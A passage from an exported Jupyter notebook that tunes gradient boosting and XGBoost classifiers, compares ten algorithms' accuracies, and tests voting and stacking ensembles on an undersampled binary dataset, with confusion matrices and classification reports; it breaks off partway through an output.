# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1, 'loss': 'log_loss', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None, 'min_impurity_decrease': 0.0, 'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100, 'n_iter_no_change': None, 'random_state': 42, 'subsample': 1.0, 'tol': 0.0001, 'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
Accuracy: 0.9561707035755479
Confusion matrix
[[2459 80]
[ 72 857]]
True Negatives (TN) = 2459
False Positives (FP) = 80
False Negatives (FN) = 72
True Positives (TP) = 857
Accuracy: 0.9561707035755479
Sensitivity: 0.922497308934338
Specificity: 0.9684915320992517
Geometric Mean: 0.9452147015822668
Precision: 0.9563020337132185
Recall: 0.9561707035755479
f1-score: 0.9562300777247025
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9716 0.9685 0.9700 2539
1 0.9146 0.9225 0.9185 929
accuracy 0.9562 3468
macro avg 0.9431 0.9455 0.9443 3468
weighted avg 0.9563 0.9562 0.9562 3468
Current Time: 2024-01-02 19:10:38
The entire notebook runtime so far is 23 minutes
# Create an instance of the model
clf = GradientBoostingClassifier()
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Define the hyperparameters to tune
param_grid = {
'n_estimators': [10, 100, 300],
'learning_rate': [0.01, 0.1, 0.2],
'max_depth': [3, 5, 10],
'random_state': [42] #for reproducible results
}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, n_jobs=-1)
# Fit the grid search to the training data
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of the model with the best hyperparameters
clf = GradientBoostingClassifier(**best_params)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_gb_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_gb = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'ccp_alpha': 0.0, 'criterion': 'friedman_mse', 'init': None, 'learning_rate': 0.1, 'loss': 'log_loss', 'max_depth': 3, 'max_features': None, 'max_leaf_nodes': None, 'min_impurity_decrease': 0.0, 'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'n_estimators': 100, 'n_iter_no_change': None, 'random_state': None, 'subsample': 1.0, 'tol': 0.0001, 'validation_fraction': 0.1, 'verbose': 0, 'warm_start': False}
Best Parameters: {'learning_rate': 0.01, 'max_depth': 10, 'n_estimators': 300, 'random_state': 42}
Best Scores: 0.9482286696200459
Cross validation scores: [0.95514512 0.95382586 0.93923382 0.95904888 0.94319683 0.94187583
0.94980185 0.95904888 0.94980185 0.93130779]
Mean cross validation score: 0.9482286696200459
Standard Deviation cross validation score: 0.008667010950104338
Accuracy: 0.9550173010380623
Confusion matrix
[[2437 102]
[ 54 875]]
True Negatives (TN) = 2437
False Positives (FP) = 102
False Negatives (FN) = 54
True Positives (TP) = 875
Accuracy: 0.9550173010380623
Sensitivity: 0.9418729817007535
Specificity: 0.9598267034265459
Geometric Mean: 0.9508074668787396
Precision: 0.9561622586477831
Recall: 0.9550173010380623
f1-score: 0.9553690856960504
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9783 0.9598 0.9690 2539
1 0.8956 0.9419 0.9182 929
accuracy 0.9550 3468
macro avg 0.9370 0.9508 0.9436 3468
weighted avg 0.9562 0.9550 0.9554 3468
Current Time: 2024-01-02 19:16:30
The entire notebook runtime so far is 28 minutes
XGBoost (eXtreme Gradient Boosting) is a popular and powerful open-source machine learning library designed for speed and performance.
It is an implementation of gradient boosting, a machine learning technique that builds a series of weak learners (typically decision trees) and combines their predictions to create a stronger, more accurate model.
XGBoost is known for its efficiency, scalability, and ability to handle diverse types of data.
XGBoost is not built into sklearn, you will need to install the package with: pip install xgboost
In this example, the xgb.DMatrix is a data structure that XGBoost uses for efficient training. The params dictionary contains various hyperparameters for the XGBoost model, and xgb.train is used to train the model. Finally, predictions are made on the test set, and the accuracy is evaluated.
# The xgboost library is not part of the default install of sklearn, check to see if xgboost library is installed
if 'xgboost' in sys.modules:
print(f"Confirmed xgboost library is installed")
else:
print(f"ERROR: xgboost library is NOT installed, please install with: pip install xgboost")
# only run the rest of the cell if the xgboost library is installed
if 'xgboost' in sys.modules:
# Convert data to DMatrix format (optimized data structure for XGBoost)
dtrain = xgb.DMatrix(X_train_resampled, label=y_train_label_resampled)
dtest = xgb.DMatrix(X_test, label=y_test_label)
# Set parameters for XGBoost
params = {
'objective': 'multi:softmax', # Multi-class classification
'num_class': 3, # Number of classes
'max_depth': 3,
'eta': 0.1,
'eval_metric': 'merror' # Mean classification error
}
# Train the XGBoost model
num_rounds = 100
xgb_model = xgb.train(params, dtrain, num_rounds)
# Make predictions on the test set
y_pred = xgb_model.predict(dtest)
# Convert predicted probabilities to class labels
y_pred = [int(round(pred)) for pred in y_pred]
# Evaluate the accuracy
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Accuracy: {accuracy}")
accuracy = clf.score(X_test, y_test_label)
print(f"Accuracy: {accuracy}")
# save accuracy for later comparison
accuracy_xgb_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Confirmed xgboost library is installed Accuracy: 0.9495386389850058 Accuracy: 0.9550173010380623
Confusion matrix
[[2406 133]
[ 42 887]]
True Negatives (TN) = 2406
False Positives (FP) = 133
False Negatives (FN) = 42
True Positives (TP) = 887
Accuracy: 0.9495386389850058
Sensitivity: 0.9547900968783638
Specificity: 0.947617172115006
Geometric Mean: 0.9511968731904493
Precision: 0.9525099226541827
Recall: 0.9495386389850058
f1-score: 0.9502562794496744
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9828 0.9476 0.9649 2539
1 0.8696 0.9548 0.9102 929
accuracy 0.9495 3468
macro avg 0.9262 0.9512 0.9376 3468
weighted avg 0.9525 0.9495 0.9503 3468
Current Time: 2024-01-02 19:16:30
The entire notebook runtime so far is 28 minutes
# The xgboost library is not part of the default install of sklearn, check to see if xgboost library is installed
if 'xgboost' in sys.modules:
print(f"Confirmed xgboost library is installed")
else:
print(f"ERROR: xgboost library is NOT installed, please install with: pip install xgboost")
# only run the rest of the cell if the xgboost library is installed
if 'xgboost' in sys.modules:
# Create an instance of the model
clf = xgb.XGBClassifier()
default_params = clf.get_params()
print(f"Default hyperparameters are: {default_params}")
print('\n')
# Define the hyperparameters to tune
param_grid = {
'objective': ['multi:softmax'],
'num_class': [3], # Number of classes
'max_depth': [3, 5, 7],
'learning_rate': [0.1, 0.01, 0.001],
'subsample': [0.8, 1.0],
'colsample_bytree': [0.8, 1.0],
'n_estimators': [50, 100, 200],
'random_state': [42] #for reproducible results
}
print(f"Adjusting hyperparameters to: {param_grid}")
print('\n')
# Use GridSearchCV to find the best hyperparameters
print(f"Performing GridSearchCV")
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, scoring='accuracy')
print(f"Fitting model")
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Print the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Evaluate the model with the best hyperparameters on the test set
clf = grid_search.best_estimator_
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the accuracy
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Accuracy: {accuracy}")
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_xgb_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_xgb = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Confirmed xgboost library is installed
Default hyperparameters are: {'objective': 'binary:logistic', 'base_score': None, 'booster': None, 'callbacks': None, 'colsample_bylevel': None, 'colsample_bynode': None, 'colsample_bytree': None, 'device': None, 'early_stopping_rounds': None, 'enable_categorical': False, 'eval_metric': None, 'feature_types': None, 'gamma': None, 'grow_policy': None, 'importance_type': None, 'interaction_constraints': None, 'learning_rate': None, 'max_bin': None, 'max_cat_threshold': None, 'max_cat_to_onehot': None, 'max_delta_step': None, 'max_depth': None, 'max_leaves': None, 'min_child_weight': None, 'missing': nan, 'monotone_constraints': None, 'multi_strategy': None, 'n_estimators': None, 'n_jobs': None, 'num_parallel_tree': None, 'random_state': None, 'reg_alpha': None, 'reg_lambda': None, 'sampling_method': None, 'scale_pos_weight': None, 'subsample': None, 'tree_method': None, 'validate_parameters': None, 'verbosity': None}
Adjusting hyperparameters to: {'objective': ['multi:softmax'], 'num_class': [3], 'max_depth': [3, 5, 7], 'learning_rate': [0.1, 0.01, 0.001], 'subsample': [0.8, 1.0], 'colsample_bytree': [0.8, 1.0], 'n_estimators': [50, 100, 200], 'random_state': [42]}
Performing GridSearchCV
Fitting model
Best Parameters: {'colsample_bytree': 0.8, 'learning_rate': 0.1, 'max_depth': 5, 'n_estimators': 50, 'num_class': 3, 'objective': 'multi:softmax', 'random_state': 42, 'subsample': 1.0}
Best Scores: 0.9488889973266226
Cross validation scores: [0.95382586 0.95646438 0.93923382 0.9682959 0.94848085 0.93791281
0.94187583 0.95376486 0.94980185 0.93923382]
Mean cross validation score: 0.9488889973266226
Standard Deviation cross validation score: 0.0091611526482453
Accuracy: 0.9561707035755479
Accuracy: 0.9561707035755479
Confusion matrix
[[2431 108]
[ 44 885]]
True Negatives (TN) = 2431
False Positives (FP) = 108
False Negatives (FN) = 44
True Positives (TP) = 885
Accuracy: 0.9561707035755479
Sensitivity: 0.9526372443487621
Specificity: 0.9574635683339897
Geometric Mean: 0.9550473576226598
Precision: 0.9578497541227655
Recall: 0.9561707035755479
f1-score: 0.9566207074466464
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9822 0.9575 0.9697 2539
1 0.8912 0.9526 0.9209 929
accuracy 0.9562 3468
macro avg 0.9367 0.9551 0.9453 3468
weighted avg 0.9578 0.9562 0.9566 3468
Current Time: 2024-01-02 19:21:58
The entire notebook runtime so far is 34 minutes
# this section compares the accuracy of different methods:
if (is_data_scaled == "yes"):
print(f"NOTE: This dataset has been scaled to avoid skewing the results due to large data distribution")
if (is_data_scaled == "no"):
print(f"NOTE: This dataset has NOT been scaled, so the results may be inaccurate!")
print('\n')
print(f"LR accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_lr_undersampled_unoptimized*100:.2f}%")
print(f"LR accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_lr_undersampled_optimized*100:.2f}%")
print('\n')
print(f"DT accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_dt_undersampled_unoptimized*100:.2f}%")
print(f"DT accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_dt_undersampled_optimized*100:.2f}%")
print('\n')
print(f"DS accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_ds_undersampled_unoptimized*100:.2f}%")
print(f"DS accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_ds_undersampled_optimized*100:.2f}%")
print('\n')
print(f"RF accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_rf_undersampled_unoptimized*100:.2f}%")
print(f"RF accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_rf_undersampled_optimized*100:.2f}%")
print('\n')
print(f"NB accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_nb_undersampled_unoptimized*100:.2f}%")
print(f"NB accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_nb_undersampled_optimized*100:.2f}%")
print('\n')
print(f"SVM accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_svm_undersampled_unoptimized*100:.2f}%")
print(f"SVM accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_svm_undersampled_optimized*100:.2f}%")
print('\n')
print(f"KNN accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_knn_undersampled_unoptimized*100:.2f}%")
print(f"KNN accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_knn_undersampled_optimized*100:.2f}%")
print('\n')
print(f"MLP accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_mlp_undersampled_unoptimized*100:.2f}%")
print(f"MLP accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_mlp_undersampled_optimized*100:.2f}%")
print('\n')
print(f"GB accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_gb_undersampled_unoptimized*100:.2f}%")
print(f"GB accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_gb_undersampled_optimized*100:.2f}%")
print('\n')
print(f"XGB accuracy on undersampled balanced data, before hyperparameter optimimization: {accuracy_xgb_undersampled_unoptimized*100:.2f}%")
print(f"XGB accuracy on undersampled balanced data, after hyperparameter optimimization: {accuracy_xgb_undersampled_optimized*100:.2f}%")
print('\n')
NOTE: This dataset has been scaled to avoid skewing the results due to large data distribution LR accuracy on undersampled balanced data, before hyperparameter optimimization: 87.17% LR accuracy on undersampled balanced data, after hyperparameter optimimization: 87.40% DT accuracy on undersampled balanced data, before hyperparameter optimimization: 93.05% DT accuracy on undersampled balanced data, after hyperparameter optimimization: 95.62% DS accuracy on undersampled balanced data, before hyperparameter optimimization: 82.61% DS accuracy on undersampled balanced data, after hyperparameter optimimization: 82.61% RF accuracy on undersampled balanced data, before hyperparameter optimimization: 95.13% RF accuracy on undersampled balanced data, after hyperparameter optimimization: 95.24% NB accuracy on undersampled balanced data, before hyperparameter optimimization: 76.73% NB accuracy on undersampled balanced data, after hyperparameter optimimization: 76.79% SVM accuracy on undersampled balanced data, before hyperparameter optimimization: 87.72% SVM accuracy on undersampled balanced data, after hyperparameter optimimization: 87.77% KNN accuracy on undersampled balanced data, before hyperparameter optimimization: 84.08% KNN accuracy on undersampled balanced data, after hyperparameter optimimization: 88.12% MLP accuracy on undersampled balanced data, before hyperparameter optimimization: 87.89% MLP accuracy on undersampled balanced data, after hyperparameter optimimization: 87.86% GB accuracy on undersampled balanced data, before hyperparameter optimimization: 95.62% GB accuracy on undersampled balanced data, after hyperparameter optimimization: 95.50% XGB accuracy on undersampled balanced data, before hyperparameter optimimization: 95.50% XGB accuracy on undersampled balanced data, after hyperparameter optimimization: 95.62%
This section takes the individual ML algorithms tested earlier, then runs them through an ensemble model The goal is to see if ensemble learning can give us higher accuracy
Voting Classifier: 2 methods: hard voting (majority vote), and soft voting (takes the average of predictive probabilities, takes the class with the highest average probability)
Stacking Classifier: Generates a final model based on multiple base models. Predictions in intermediate steps are used to generate meta-models.
Boosting Classifer: Trains weak model, generate new model on poorly performing instances, tweak the weights to get better accuracy. The AdaBoostClassifier is an ensemble learning algorithm that belongs to the family of boosting methods. It is specifically designed for binary classification problems but can be extended to multi-class classification. AdaBoost stands for Adaptive Boosting, and its primary goal is to combine the predictions from multiple weak classifiers to create a strong classifier.
Bagging Classifier: Bagging (Bootstrap Aggregating) is an ensemble learning technique that aims to improve the stability and accuracy of machine learning models. It involves training multiple instances of the same base model on different subsets of the training data. The predictions from individual models are then combined, often by averaging or voting, to produce the final prediction. BaggingClassifier is a powerful ensemble technique that is particularly effective when applied to base models with high variance. It offers improved generalization, stability, and robustness, but it may not be the optimal choice for all scenarios, and its effectiveness depends on the characteristics of the base model and the dataset.
Comparison Table
| Method | Combines Models | Strengths | Weaknesses |
|---|---|---|---|
| Voting | Yes | Simple, effective for balancing out model weaknesses. | Not as sophisticated as other methods. |
| Stacking | Yes | Can leverage the strengths of a combination of models. | Risk of overfitting. |
| Boosting | No | Can turn a weak model into a strong one. | Sensitive to noisy data and outliers. |
| Bagging | No | Minimizes overfitting with data with high variance | Depends on base model performance |
print(f"Best parameters for LR: {best_params_lr}")
print(f"Best parameters for DT: {best_params_dt}")
print(f"Best parameters for DS: {best_params_ds}")
print(f"Best parameters for RF: {best_params_rf}")
print(f"Best parameters for NB: {best_params_nb}")
print(f"Best parameters for SVM: {best_params_svm}")
print(f"Best parameters for KNN: {best_params_knn}")
print(f"Best parameters for MLP: {best_params_mlp}")
print(f"Best parameters for GB: {best_params_gb}")
print(f"Best parameters for XGB: {best_params_xgb}")
Best parameters for LR: {'C': 100, 'max_iter': 100, 'penalty': 'l2', 'random_state': 42, 'solver': 'liblinear'}
Best parameters for DT: {'criterion': 'entropy', 'max_depth': 10, 'min_samples_leaf': 1, 'min_samples_split': 5, 'random_state': 42}
Best parameters for DS: {'criterion': 'gini', 'max_depth': 1, 'min_samples_leaf': 1, 'min_samples_split': 2, 'random_state': 42}
Best parameters for RF: {'max_depth': 10, 'n_estimators': 100, 'random_state': 42}
Best parameters for NB: {'alpha': 0.1}
Best parameters for SVM: {'C': 10, 'kernel': 'rbf', 'probability': True, 'random_state': 42}
Best parameters for KNN: {'n_neighbors': 10, 'weights': 'uniform'}
Best parameters for MLP: {'alpha': 0.01, 'hidden_layer_sizes': (150, 100), 'max_iter': 300, 'random_state': 42}
Best parameters for GB: {'learning_rate': 0.01, 'max_depth': 10, 'n_estimators': 300, 'random_state': 42}
Best parameters for XGB: {'colsample_bytree': 0.8, 'learning_rate': 0.1, 'max_depth': 5, 'n_estimators': 50, 'num_class': 3, 'objective': 'multi:softmax', 'random_state': 42, 'subsample': 1.0}
# In the previous cell, we have optimized hyperparameters for each of the base classifiers saved in python dictionaries.
# Now we will use the ** unpacking syntax to pass the key-value pairs from the dictionaries as keyword arguments to each classifier constructor.
# This way, the hyperparameters specified in each dictionary are correctly applied when creating each individual classifier.
# Define individual classifiers using hyperparameters calculated earlier
lr_clf = LogisticRegression(**best_params_lr)
dt_clf = DecisionTreeClassifier(**best_params_dt)
ds_clf = DecisionTreeClassifier(**best_params_ds)
rf_clf = RandomForestClassifier(**best_params_rf)
nb_clf = BernoulliNB(**best_params_nb)
svm_clf = SVC(**best_params_svm) #need probability=True for voting classifier, already set in hyperparameter optimization section
knn_clf = KNeighborsClassifier(**best_params_knn)
mlp_clf = MLPClassifier(**best_params_mlp)
gb_clf = GradientBoostingClassifier(**best_params_gb)
xgb_clf = xgb.XGBClassifier(**best_params_xgb)
print(f"Best parameters for LR: {lr_clf}")
print(f"Best parameters for DT: {dt_clf}")
print(f"Best parameters for DS: {ds_clf}")
print(f"Best parameters for RF: {rf_clf}")
print(f"Best parameters for NB: {nb_clf}")
print(f"Best parameters for SVM: {svm_clf}")
print(f"Best parameters for KNN: {knn_clf}")
print(f"Best parameters for MLP: {mlp_clf}")
print(f"Best parameters for GB: {gb_clf}")
print(f"Best parameters for XGB: {xgb_clf}")
Best parameters for LR: LogisticRegression(C=100, random_state=42, solver='liblinear')
Best parameters for DT: DecisionTreeClassifier(criterion='entropy', max_depth=10, min_samples_split=5,
random_state=42)
Best parameters for DS: DecisionTreeClassifier(max_depth=1, random_state=42)
Best parameters for RF: RandomForestClassifier(max_depth=10, random_state=42)
Best parameters for NB: BernoulliNB(alpha=0.1)
Best parameters for SVM: SVC(C=10, probability=True, random_state=42)
Best parameters for KNN: KNeighborsClassifier(n_neighbors=10)
Best parameters for MLP: MLPClassifier(alpha=0.01, hidden_layer_sizes=(150, 100), max_iter=300,
random_state=42)
Best parameters for GB: GradientBoostingClassifier(learning_rate=0.01, max_depth=10, n_estimators=300,
random_state=42)
Best parameters for XGB: XGBClassifier(base_score=None, booster=None, callbacks=None,
colsample_bylevel=None, colsample_bynode=None,
colsample_bytree=0.8, device=None, early_stopping_rounds=None,
enable_categorical=False, eval_metric=None, feature_types=None,
gamma=None, grow_policy=None, importance_type=None,
interaction_constraints=None, learning_rate=0.1, max_bin=None,
max_cat_threshold=None, max_cat_to_onehot=None,
max_delta_step=None, max_depth=5, max_leaves=None,
min_child_weight=None, missing=nan, monotone_constraints=None,
multi_strategy=None, n_estimators=50, n_jobs=None, num_class=3,
num_parallel_tree=None, ...)
In this example:
SVC, KNeighborsClassifier, and RandomForestClassifier are individual classifiers.
A VotingClassifier is created with these classifiers and a soft voting strategy. Soft voting predicts the class label based on the argmax of the sums of the predicted probabilities.
The ensemble model is trained on the training set.
Predictions are made on the test set, and the performance of the ensemble model is evaluated.
You can adjust the parameters of the individual classifiers and the VotingClassifier based on your specific needs. Note that not all classifiers support probability estimates (probability=True), so make sure to check the documentation for each classifier.
Ensemble methods like VotingClassifier are beneficial when combining diverse models that capture different aspects of the data, leading to a more robust and accurate overall model.
# Try the voting classifier with all the base models
# Create a VotingClassifier with 'soft' voting (uses predicted probabilities)
clf = VotingClassifier(
estimators=[('lr', lr_clf), ('dt', dt_clf), ('rf', rf_clf), ('nb', nb_clf), ('svm', svm_clf), ('knn', knn_clf), ('mlp', mlp_clf), ('gb', gb_clf)],
voting='soft' # 'hard' for majority voting, 'soft' for weighted voting based on probabilities
)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Make predictions on the test set
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ensemble_voting = accuracy
Accuracy: 0.9359861591695502
# Try the voting classifier with stronger learners to see if you get better accuracy
# Create a VotingClassifier with 'soft' voting (uses predicted probabilities)
clf = VotingClassifier(
estimators=[('svm', svm_clf), ('rf', rf_clf), ('dt', dt_clf)],
voting='soft' # 'hard' for majority voting, 'soft' for weighted voting based on probabilities
)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Make predictions on the test set
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ensemble_voting = accuracy
Accuracy: 0.9495386389850058
# Try the voting classifier with the weakest base models
# Create a VotingClassifier with 'soft' voting (uses predicted probabilities)
clf = VotingClassifier(
estimators=[('lr', lr_clf), ('ds', ds_clf), ('nb', nb_clf), ('svm', svm_clf), ('knn', knn_clf), ('mlp', mlp_clf)],
voting='soft' # 'hard' for majority voting, 'soft' for weighted voting based on probabilities
)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Make predictions on the test set
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ensemble_voting = accuracy
Accuracy: 0.884083044982699
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Confusion matrix
[[2373 166]
[ 236 693]]
True Negatives (TN) = 2373
False Positives (FP) = 166
False Negatives (FN) = 236
True Positives (TP) = 693
Accuracy: 0.884083044982699
Sensitivity: 0.7459634015069968
Specificity: 0.9346199291059473
Geometric Mean: 0.8349803958369925
Precision: 0.8820082383360506
Recall: 0.884083044982699
f1-score: 0.8826020682573016
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9095 0.9346 0.9219 2539
1 0.8068 0.7460 0.7752 929
accuracy 0.8841 3468
macro avg 0.8581 0.8403 0.8485 3468
weighted avg 0.8820 0.8841 0.8826 3468
Current Time: 2024-01-02 19:22:53
The entire notebook runtime so far is 35 minutes
# Create the VotingClassifier
clf = VotingClassifier(estimators=[('lr', lr_clf), ('svm', svm_clf), ('nb', nb_clf), ('knn', knn_clf)], voting='hard')
# Define the hyperparameters to tune
param_grid = {
'lr__C': [0.1, 1, 10], # LogisticRegression hyperparameter
'svm__C': [0.1, 1, 10], # SVC hyperparameter
'knn__n_neighbors': [5, 10, 30], # KNN hyperparameter
'nb__alpha': [0.1, 0.01, 0.001, 0.0001] # NB hyperparameter
}
# Use GridSearchCV for hyperparameter tuning
print(f"Performing GridSearchCV")
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, scoring='accuracy')
print(f"Fitting model")
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Validate on Test Set
clf = grid_search.best_estimator_
print(f"Found best_estimator_ {clf}")
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate performance on the test set
accuracy = accuracy_score(y_test_label, y_pred)
print(f"Final Accuracy on Test Set: {accuracy}")
# save accuracy for later comparison
accuracy_ensemble_voting = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Performing GridSearchCV
Fitting model
Found best_estimator_ VotingClassifier(estimators=[('lr',
LogisticRegression(C=10, random_state=42,
solver='liblinear')),
('svm',
SVC(C=10, probability=True, random_state=42)),
('nb', BernoulliNB(alpha=0.1)),
('knn', KNeighborsClassifier())])
Cross validation scores: [0.86015831 0.85224274 0.84676354 0.85204756 0.85865258 0.83751651
0.86393659 0.8348745 0.85204756 0.85336856]
Mean cross validation score: 0.8511608453031163
Standard Deviation cross validation score: 0.008824206164796206
Final Accuracy on Test Set: 0.885524798154556
Confusion matrix
[[2398 141]
[ 256 673]]
True Negatives (TN) = 2398
False Positives (FP) = 141
False Negatives (FN) = 256
True Positives (TP) = 673
Accuracy: 0.885524798154556
Sensitivity: 0.7244348762109796
Specificity: 0.944466325324931
Geometric Mean: 0.8271664557223082
Precision: 0.8829793952879691
Recall: 0.885524798154556
f1-score: 0.8830159022185697
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9035 0.9445 0.9236 2539
1 0.8268 0.7244 0.7722 929
accuracy 0.8855 3468
macro avg 0.8652 0.8345 0.8479 3468
weighted avg 0.8830 0.8855 0.8830 3468
Current Time: 2024-01-02 21:38:56
The entire notebook runtime so far is 171 minutes
This model (StackingClassifier) uses multiple base estimators such as LR, NB, SVC, KNN, etc.
A StackingClassifier is created with these multiple base classifiers classifiers and a meta-classifier (LogisticRegression) as the final estimator.
The stacking ensemble model is trained on the training set.
Predictions are made on the test set, and the performance of the stacking ensemble model is evaluated.
You can customize the base estimators, the final estimator, and other parameters of the StackingClassifier based on your specific needs.
# Try all the base estimators with the default final_estimator
# Create a stacking ensemble model with a logistic regression meta-classifier
clf = StackingClassifier(
estimators=[('lr', lr_clf), ('dt', dt_clf), ('rf', rf_clf), ('nb', nb_clf), ('svm', svm_clf), ('knn', knn_clf), ('mlp', mlp_clf), ('gb', gb_clf)],
final_estimator=LogisticRegression()
)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Make predictions on the test set
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ensemble_stacking = accuracy
Accuracy: 0.9576124567474048
# Try only the strongest base classifiers in the stacking classifier, with the default final_estimator
clf = StackingClassifier(
estimators=[('dt', dt_clf), ('rf', rf_clf), ('gb', gb_clf)],
final_estimator=LogisticRegression()
)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Make predictions on the test set
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ensemble_stacking = accuracy
Accuracy: 0.9506920415224913
# Try only the weakest base models with the default final_estimator
# Create a stacking ensemble model with a logistic regression meta-classifier
clf = StackingClassifier(
estimators=[('lr', lr_clf), ('nb', nb_clf), ('svm', svm_clf), ('knn', knn_clf), ('mlp', mlp_clf)],
final_estimator=LogisticRegression()
)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Make predictions on the test set
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_ensemble_stacking = accuracy
Accuracy: 0.8667820069204152
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Confusion matrix
[[2291 248]
